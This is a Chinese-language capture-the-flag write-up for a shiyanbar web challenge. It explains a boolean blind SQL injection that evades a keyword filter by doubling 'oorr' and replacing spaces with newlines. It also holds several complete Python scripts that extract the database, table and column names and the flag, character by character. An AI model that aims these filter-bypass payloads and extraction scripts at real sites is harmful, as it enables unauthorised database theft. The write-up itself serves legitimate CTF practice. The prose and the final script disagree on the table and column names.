认真一点!-实验吧

这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected

然后fuzz一下,图我就不贴了,做的时候忘了截下图

结果大概是过滤了and,空格,逗号,union,+

这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊

试了几下,后台好像是匹配到or就会删去,这里用oorr就可以解决了

剩下的,就是布尔盲注了

先爆数据库名长度

import requests
print("start")
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php "
for i in range(1,30):
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    res = requests.post(url,data=key).text
    print(i)
    if str in res:
        print('database length: %s'%i)
        break
print("end!")

认真一点!-实验吧_第1张图片

18个,然后就是爆数据库名

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        res = requests.post(url,data=key).text
        print('............%s......%s.......'%(i,j))
        if str in res:
            database += j
            break
print(database)
print("end!")

认真一点!-实验吧_第2张图片

表长度

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i+=1
print("end!")

认真一点!-实验吧_第3张图片

表名(这里是用@分隔开了表名,有两张表)

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        res = res.replace(' ', chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print(i)
        if str in r:
            table += j
            break
print(table)
print("end!")

认真一点!-实验吧_第4张图片

列宽

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
    res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
    res = res.replace(' ',chr(0x0a))
    key = {'id':res}
    r = requests.post(url,data=key).text
    print(i)
    if str in r:
        print("length: %s"%i)
        break
    i += 1
print("end!")
认真一点!-实验吧_第5张图片

列名

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        print("......%s.........%s........."%(i,j))
        if str in r:
            column+=j
            break
print(column)
print("end!")
认真一点!-实验吧_第6张图片

很明显,flag表flag列,dump一下就行了

import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
    for j in guess:
        res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
        res = res.replace(' ',chr(0x0a))
        key = {'id':res}
        r = requests.post(url,data=key).text
        'print("........%s..........%s........"%(i,j))'
        if str in r:
            flag+=j
            print(flag)
            break
print(flag)
print("end!")
认真一点!-实验吧_第7张图片

flag get√

不过这里有个错误,我没有把空格考虑进去,然后那个减号其实是空格2333


你可能感兴趣的:(ctf)